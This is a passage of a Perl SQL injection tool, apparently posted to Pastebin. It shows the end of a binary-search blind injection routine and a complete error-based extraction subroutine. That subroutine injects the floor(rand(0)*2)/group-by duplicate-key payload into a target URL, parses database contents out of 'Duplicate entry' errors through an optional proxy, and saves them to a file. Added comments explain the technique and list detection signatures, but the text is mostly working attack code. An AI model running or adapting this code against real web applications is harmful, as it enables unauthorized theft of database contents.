            my $lwp = new LWP::UserAgent or die;
            $lwp->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4");
    
       my $res = $lwp->get($final);
            my $myres=$res->content; #for test (unused below)
       #printf($myres) ;    #for test
       #if($myres=~/http:\/\/login.renren.com\/callback.do/)
            #To judge if the login is sucess
            # $turestr is interpolated as a regex pattern.
            if($res->content =~ /$turestr/)
       {
                    $min=$mid;
                    fuzz_half($sql,$subset,$min,$max);
       }
            else
            {
                    $max=$mid;
                    fuzz_half($sql,$subset,$min,$max);
            }
    }
    
    # Error-based extraction of the result of the SQL expression $loadx, 62
    # characters per request. Each iteration embeds substring(($loadx),$i,62) in
    # the floor(rand(0)*2)/group-by duplicate-key construct and parses the value
    # out of a "Duplicate entry '1<chunk>' for key" message in the response; the
    # chunks are concatenated into the global $result, which is printed and
    # appended to result.txt in the current directory. Stops at the first chunk
    # that is empty or cannot be parsed. No return value.
    # Defender notes: the technique depends entirely on verbose DB errors reaching
    # the client; the fixed `floor(rand(0)*2)` / `group+by+a)b)` fragment and
    # `information_schema.tables` in the query string are reliable signatures.
    sub err_exp
    {
            my($loadx) = @_;
    
            $ua2 = new LWP::UserAgent or die;
            $ua2->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4");
            $ua2->timeout(35);
            $ua2->proxy("http", "http://$proxy/") if defined($proxy);
            $result='';
            for($i=1;$i<8000;$i=$i+62)
            {
                    # when the account has no privilege on information_schema, another known database must be substituted here
                    #$xsql = "and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((Select ($loadx)),$i,62)))a+from+information_schema.tables+group by a)b)";
                    $xsql = "and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((Select ($loadx)),$i,62)))a+from+information_schema.tables+group+by+a)b)";
                    $final=$target.'+'.$xsql.$comstr;
                    print $final."\n";
                    $res=$ua2->get($final);
                    #print $res->content;
                    # "Duplicate entry '1' for key" with nothing after the 1 means the substring was empty: end of data.
                    if ($res->content =~/Duplicate entry \'1\' for key /)
                    {
                            print "[+] got data finished!\n";
                            last;
                    }
                    # /s lets [\s\S]* behave like .* across newlines; the capture is greedy.
                    if ($res->content =~ /Duplicate entry \'1([\s\S]*)\' for key /s)
                    {
                        # $& is the whole match; strip the prefix, then cut at the first "' for key ".
                        $content = $&;
                        $content =~ s/Duplicate entry \'1//g;
                        #$content =~ s/\' for key //;
                        if(length($content)<1)
                        {
                                    print "[+] got data finished!\n";
                                    last;
    
                        }
                        $position = index($content,"\' for key ");
                        $content = substr($content,0,$position);
    
                        $result .= $content;
                        print "[+] content : \n$result\n\n";
                    }else
                    {
                            print "[-]can not got data!\n";
                            last;
                    }
            }
            print "[+] result : \n$result\n\n";
            # Two-argument open on a bareword handle with no error check; appends to ./result.txt.
            open(FH,">>result.txt");
            print FH ("$result\n\n");
            close(FH);
    }

 


Source: http://pastebin.com/RHqfLers


 
